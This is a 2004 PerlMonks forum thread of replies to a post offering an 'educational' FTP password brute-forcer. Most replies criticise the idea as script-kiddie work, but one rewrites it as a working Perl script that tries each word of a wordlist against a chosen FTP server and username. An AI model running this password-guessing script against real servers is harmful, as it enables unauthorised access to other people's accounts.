Category:
Author/Contact Info
Description:
Replies are listed 'Best First'.
Re: Simple FTP Brute Forcer (educational purpose only!)
by dragonchild (Archbishop) on May 12, 2004 at 18:38 UTC
    In addition to any other concern that has been raised (all of which I agree with), this isn't even an example of well-written Perl.
    1. You don't use strict or warnings
    2. You unnecessarily double-quote variables
    3. You use goto instead of last

    Assuming that this code should be written, it would be better written as so: 

    use strict;
use warnings;

use Net::FTP;
print "Enter the FTP server I should try to brute force::\n";
chomp(my $server = <STDIN>);

print "What username do you want to brute force?\n";
chomp(my $user = <STDIN>);

my $ftp = Net::FTP->new( $server )
    or die "\nCould not connect: $!";

open WORDLIST, "wordlist.txt"
    or die "\nCould not open wordlist.txt. Exiting...\n";
chomp( my @wordlist = <WORDLIST> );
close WORDLIST;

my $password;
foreach $password (@wordlist)
{
    next unless $ftp->login($user, $password);

    print "$password is the password for user : $user !\n";
    last;
}
die "Password was not found! Error" unless $password;

    [download]

    ------
    We are the carpenters and bricklayers of the Information Age.

    Then there are Damian modules.... *sigh* ... that's not about being less-lazy -- that's about being on some really good drugs -- you know, there is no spoon. - flyingmoose

    I shouldn't have to say this, but any code, unless otherwise stated, is untested

[reply]
[d/l]
Re: Simple FTP Brute Forcer (educational purpose only!)
by diotalevi (Canon) on May 12, 2004 at 15:44 UTC

    What were you expecting someone to pick up that isn't already abley handled by the first example in the pod? I include it here for your reference. You'll note that it authenticates, changes directory, fetches a file and then exits. The only addition you appear to have made was to add some obnoxious script kiddy garbage. Please explain yourself. You've just set an example of poor behaviour.

        use Net::FTP;

    $ftp = Net::FTP->new("some.host.name", Debug => 0)
      or die "Cannot connect to some.host.name: $@";

    $ftp->login("anonymous",'-anonymous@')
      or die "Cannot login ", $ftp->message;

    $ftp->cwd("/pub")
      or die "Cannot change working directory ", $ftp->message;

    $ftp->get("that.file")
      or die "get failed ", $ftp->message;

    $ftp->quit;

    [download]
[reply]
[d/l]
Re: Simple FTP Brute Forcer (educational purpose only!)
by PhilHibbs (Hermit) on May 12, 2004 at 15:51 UTC
    I've got a script that retries on a failed FTP connection, and at one point it was retrying on a failed login due to incorrect password (it retried the same password). It now detects password failures and doesn't retry. The remote machine instantly locked out the account under these circumstances. I can't see this script being much use, besides it also being trivial. You have to know the username, for a start.

    Not worthy even of an acolyte. Try doing a script that detects disconnections and retries, that would be more useful, or one that transposes the case of a user-supplied login & password and tries that, in case the user got Caps Lock turned on by mistake.

[reply]
Re: Simple FTP Brute Forcer (educational purpose only!)
by azerton (Beadle) on May 12, 2004 at 17:11 UTC
    		[reply]
        Howdy!

        If you wanted to practice working with files, why did you set it in this context? Placing it in the context of trying to crack a password through FTP connection attempts runs a whole string of red flags up the pole.

        yours,
        Michael
    		[reply]
    A reply falls below the community's threshold of quality. You may see it by logging in.

    Back to Code Catacombs